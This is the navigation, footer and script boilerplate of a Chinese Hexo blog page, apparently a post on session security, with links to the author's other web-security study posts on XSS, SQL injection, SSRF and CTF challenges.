      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2hxMTg1MTg3" title="https:&#x2F;&#x2F;github.com&#x2F;hq185187"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/06/29/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/07/06/XML%E5%9F%BA%E7%A1%80/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" title="php反序列化漏洞学习">php反序列化漏洞学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/XSS/" title="分类于 XSS">XSS</a>
</div>

    <span><a href="/2023/06/26/XSS%E5%AD%A6%E4%B9%A0/" title="XSS初学习1">XSS初学习1</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/XSS/" title="分类于 XSS">XSS</a>
</div>

    <span><a href="/2023/06/27/XSS%E5%AD%A6%E4%B9%A02/" title="XSS初学习2">XSS初学习2</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/21/%E5%8F%8D%E5%BC%B9shell%E5%AD%A6%E4%B9%A0/" title="反弹shell学习">反弹shell学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/unserialize-labs/" title="Unserialize-labs">Unserialize-labs</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/30/SSRF/" title="SSRF绕过">SSRF绕过</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" title="正则表达式">正则表达式</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/sql/" title="分类于 SQL注入">SQL注入</a>
</div>

    <span><a href="/2023/04/28/sqli-labs/" title="Sqli-labs靶场通关">Sqli-labs靶场通关</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/29/CRLF/" title="CRLF学习">CRLF学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/NSSCTF/" title="分类于 NSSCTF精选">NSSCTF精选</a>
</div>

    <span><a href="/2023/05/12/nssctf2/" title="NSSCTF2">NSSCTF2</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">hq185187 @ 不良人天藏星</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">171k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">2:36</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/07/01/session安全/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
